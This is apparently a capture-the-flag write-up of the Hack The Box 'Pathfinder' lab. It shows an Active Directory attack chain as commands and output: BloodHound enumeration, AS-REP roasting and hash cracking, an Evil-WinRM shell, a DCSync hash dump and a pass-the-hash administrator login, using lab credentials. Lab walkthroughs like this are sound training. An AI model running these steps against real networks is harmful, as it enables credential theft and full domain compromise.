HTB Starting Point – Pathfinder


[+] scan started...

[-] Open ports : 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49673,49676,49677,49683,49698,49720 found

Starting Nmap 7.80 ( ) at 2020-05-21 22:39 CEST
Stats: 0:02:33 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.81% done; ETC: 22:41 (0:00:00 remaining)
Nmap scan report for
Host is up (0.042s latency).

53/tcp    open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-05-22 03:42:05Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc         Microsoft Windows RPC
49683/tcp open  msrpc         Microsoft Windows RPC
49698/tcp open  msrpc         Microsoft Windows RPC
49720/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at :
Service Info: Host: PATHFINDER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h02m38s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-05-22T03:44:26
|_  start_date: N/A

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 278.22 seconds
[+] scan finished...

Open ports detected: 

88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-05-23 23:54:30Z)

389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)

3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)

5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  • WinRM 2.0 (Microsoft Windows Remote Management) uses port 5985/tcp for HTTP and 5986/tcp for HTTPS by default. 

Using the credentials we obtained in a previous machine; sandra:Password1234!, we can attempt to enumerate Active Directory. 
We can achieve this using BloodHound. There is a python bloodhound ingester, which can be found here

We can attempt to enumerate Active Directory.

Try using old machine credentials…

BloodHound is a single page Javascript web application that uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment. is a Python-based ingestor for BloodHound, based on Impacket.

pip install bloodhound

/usr/share/python-wheels/pkg_resources-0.0.0-py3-none-any.whl/pkg_resources/ UserWarning: Setuptools will stop working on Python 2
You are running Setuptools on Python 2, which is no longer
supported and
in a subsequent release (no sooner than 2020-04-20).
Please ensure you are installing
Setuptools using pip 9.x or later or pin to `setuptools<45`
in your environment.
If you have done those things and are still encountering
this message, please follow up at
WARNING: pip is being invoked by an old script wrapper. This will fail in a future version of pip.
Please see for advice on fixing the underlying issue.
To avoid this problem you can invoke Python with '-m pip' instead of running pip directly.
DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. A future version of pip will drop support for Python 2.7. More details about Python 2 support in pip, can be found at
Collecting bloodhound
  Downloading bloodhound-1.0.5-py2-none-any.whl (64 kB)
     |████████████████████████████████| 64 kB 1.8 MB/s
Collecting ldap3!=2.5.0,!=2.5.2,!=2.6,>=2.5
  Downloading ldap3-2.7-py2.py3-none-any.whl (420 kB)
     |████████████████████████████████| 420 kB 8.2 MB/s
Requirement already satisfied: pyasn1>=0.4 in /usr/lib/python2.7/dist-packages (from bloodhound) (0.4.2)
Collecting dnspython
  Downloading dnspython-1.16.0-py2.py3-none-any.whl (188 kB)
     |████████████████████████████████| 188 kB 18.7 MB/s
Requirement already satisfied: impacket>=0.9.17 in /usr/lib/python2.7/dist-packages (from bloodhound) (0.9.20)
Requirement already satisfied: future in /usr/lib/python2.7/dist-packages (from bloodhound) (0.18.2)
Collecting ldapdomaindump>=0.9.0
  Downloading ldapdomaindump-0.9.2-py2-none-any.whl (21 kB)
ERROR: impacket 0.9.20 has requirement ldap3==2.5.1, but you'll have ldap3 2.7 which is incompatible.
Installing collected packages: ldap3, dnspython, bloodhound, ldapdomaindump
Successfully installed bloodhound-1.0.5 dnspython-1.16.0 ldap3-2.7 ldapdomaindump-0.9.2

To solve this error: 

$bloodhound-python -d megacorp.local -u sandra -p "Password1234!" -gc pathfinder.megacorp.local -c all -ns

INFO: Found AD domain: megacorp.local
INFO: Connecting to LDAP server: Pathfinder.MEGACORP.LOCAL
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: Pathfinder.MEGACORP.LOCAL
INFO: Found 5 users
INFO: Connecting to GC LDAP server: pathfinder.megacorp.local
INFO: Found 51 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: Pathfinder.MEGACORP.LOCAL
INFO: Done in 00M 08S

Installing and Starting BloodHound

configure the neo4j service.

$ neo4j console


$ bloodhound --no-sandbox

import *.json files previously obtained.

Useful queries: Shortest Paths to High value Targets & Find Principles with DCSync Rights

We can see that the svc_bes has GetChangesAll privileges to the domain.
GetChangesAll means that user svc_bes can request replication data from the domain controller. 

Lateral movement

Checking if Kerberos pre-authentication has been disabled for this account, which means it is vulnerable to ASREPRoasting.
We can check this using a tool such as Impacket’s GetNPUsers.

Impacket install
$pip install .

$ megacorp.local/svc_bes -request -no-pass -dc-ip

Impacket v0.9.22.dev1 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for svc_bes

This is the Kerberos Ticket Granting Ticket for the user svc_bes.

Save this ticket to a new file.

$vim svc_bes.hash

Use John the Ripper to obtain the password from the hash.

$john svc_bes.hash -wordlist=/usr/share/wordlists/rockyou.txt

Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Sheffield19      ($krb5asrep$23$svc_bes@MEGACORP.LOCAL)
1g 0:00:00:09 DONE (2020-05-24 12:46) 0.1049g/s 1112Kp/s 1112Kc/s 1112KC/s Sherbear94..Sheepy04
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Now we’ve obtained svc_bes credentials (username = svc_bes; password Sheffield19)

Then we can use WinRM to access with svc_bes credentials
(if you want to use it in your python scripts)
(stand-alone WinRM shell)

 $sudo gem install evil-winrm

 $evil-winrm -i -u svc_bes -p Sheffield19

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_bes\Documents> dir
*Evil-WinRM* PS C:\Users\svc_bes\Documents> cd ..
*Evil-WinRM* PS C:\Users\svc_bes> cd Desktop
*Evil-WinRM* PS C:\Users\svc_bes\Desktop> dir

    Directory: C:\Users\svc_bes\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        2/25/2020   2:35 PM             32 user.txt

*Evil-WinRM* PS C:\Users\svc_bes\Desktop> type user.txt
*Evil-WinRM* PS C:\Users\svc_bes\Desktop>

Privilege escalation

To leverage the GetChangesAll permission, we can use Impacket’s to perform a DCSync attack and dump the NTLM hashes of all domain users.

DCSync is a late-stage kill chain attack that allows an attacker to simulate the behavior of Domain Controller (DC) in order to retrieve password data via domain replication. Once an attacker has access to a privileged account with domain replication rights, the attacker can utilize replication protocols to mimic a domain controller.

NT LAN Manager (NTLM) is the Microsoft authentication protocol that was created to be the successor of LM.

$ -dc-ip MEGACORP.LOCAL/svc_bes:Sheffield19@

Impacket v0.9.22.dev1 - Copyright 2020 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[*] Kerberos keys grabbed
[*] Cleaning up...

Using the default domain administrator NTLM hash, we can use this in a PTH attack to gain elevated access to the system.

A Pass-the-Hash (PtH) attack is a technique whereby an attacker captures a password hash (as opposed to the password characters) and then simply passes it through for authentication and potentially lateral access to other networked systems.

We can use Impacket’s megacorp.local/administrator@ -hashes 500:aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18:::

 $ megacorp.local/administrator@ -hashes aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *